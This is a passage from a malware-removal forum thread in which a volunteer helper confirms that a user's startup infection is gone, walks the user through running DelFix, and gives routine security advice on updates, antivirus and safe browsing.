C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa => moved successfully
C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat => moved successfully
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 37217888 B
Java, Flash, Steam htmlcache => 17193782 B
Windows/system/drivers => 53873999 B
Edge => 0 B
Chrome => 394889007 B
Firefox => 392367499 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 117050590 B
systemprofile32 => 66228 B
LocalService => 0 B
NetworkService => 66228 B
Franco => 1508682558 B
 
RecycleBin => 0 B
EmptyTemp: => 2.3 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 18:33:19 ====


#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  •  
  • Gender:Male
  • Local time:12:34 PM

Posted 17 January 2018 - 08:08 AM

Good! Now do you still get the CMD prompts on startup, or did they stop?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 Pepsiman22

Pepsiman22
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:34 PM

Posted 17 January 2018 - 05:10 PM

Nah they stopped. I think i did that with the task scheduler, dunno. 



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  •  
  • Gender:Male
  • Local time:12:34 PM

Posted 17 January 2018 - 07:11 PM

You did. I deleted all the tasks launching the infection, and the files associated with it as well.

Were there any other issues to address, or that was it?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 Pepsiman22

Pepsiman22
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:34 PM

Posted 17 January 2018 - 08:36 PM

Not really. That was pretty much it. Thank you Yoan!





...Man canadians are the best.



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  •  
  • Gender:Male
  • Local time:12:34 PM

Posted 18 January 2018 - 07:59 AM

No problem, you're welcome!

...Man canadians are the best.


We're too nice, eh? :P

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

BWuhenj.pngDelFix
Follow the instructions below to download and execute DelFix.
  • Download DelFix and move the executable to your Desktop;
  • Right-click on DelFix.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Check the following options :
    • Activate UAC;
    • Remove disinfection tools;
    • Create registry backup;
    • Purge system restore;
    • Reset system settings;
  • Once all the options mentionned above are checked, click on Run;
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply;
Qt25440.pngTips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits which is one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like eLDnJfI.pngSecuniaPSI and y5YE7At.pngHeimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.

Antivirus, Antimalware, Firewall and Anti-Exploit/Ransomware

Having a decent security setup (led by an Antivirus) is the most crucial step to protect a system. These programs are a layer of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Ideally, you should have on your system one Antivirus (never more than one installed at the time), one Antimalware (you can install multiple of these, assuming they do not conflict with each other and the other security programs installed), one Firewall and if you wish, one Anti-Exploit and/or Anti-Ransomware (since Ransomware are currently the most dangerous threat around and it can hit anywhere). Here are a few programs worth checking out if you don't have one yet.

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

AntivirusAntimalwareFirewall
Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.
  • 7p3JzTS.pngGlassWire - Has both a free and paid version (with different packages);
  • MQIMh6k.pngWindows Firewall Control - Gives you more control over your Windows Firewall;
  • 5RXGshU.pngTinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it;
Anti-Exploit/Anti-RansomwareWeb Browsers and Web Browsing

Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you to install.
  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome and Mozilla Firefox, called uBlock on Opera);
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera);
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browsers);
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers);
  • uMatrix: For advanced users, a point and click matrix-like extensions that allow you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera);
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser);
As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far less chances to get infected by a malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you to avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices :gRvSooB.pngThe End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you wont!), you can always comeback in this section to get another checkup with one of our trained malware removal member.

Do you have any questions before I close this thread? :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#13 Pepsiman22

Pepsiman22
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:34 PM

Posted 18 January 2018 - 01:24 PM

Here!
# DelFix v1.013 - Logfile created 18/01/2018 at 15:19:16

# Updated 17/04/2016 by Xplode
# Username : Franco - POROTA
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
 
~ Activating UAC ... OK
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\Users\Franco\Desktop\¡Sea fuerte!.png
Deleted : C:\Users\Franco\Downloads\Addition.txt
Deleted : C:\Users\Franco\Downloads\Fixlog.txt
Deleted : C:\Users\Franco\Downloads\FRST.txt
Deleted : C:\Users\Franco\Downloads\FRST64.exe
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
Deleted : RP #88 [Restore Point Created by FRST | 01/16/2018 21:32:03]
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########

Feel free to close it. Thanks you ^^


#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  •  
  • Gender:Male
  • Local time:12:34 PM

Posted 18 January 2018 - 01:54 PM

No problem Pepsiman, you're welcome!

Stay safe :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  •  
  • Gender:Male
  • Local time:12:34 PM

Posted 18 January 2018 - 01:55 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users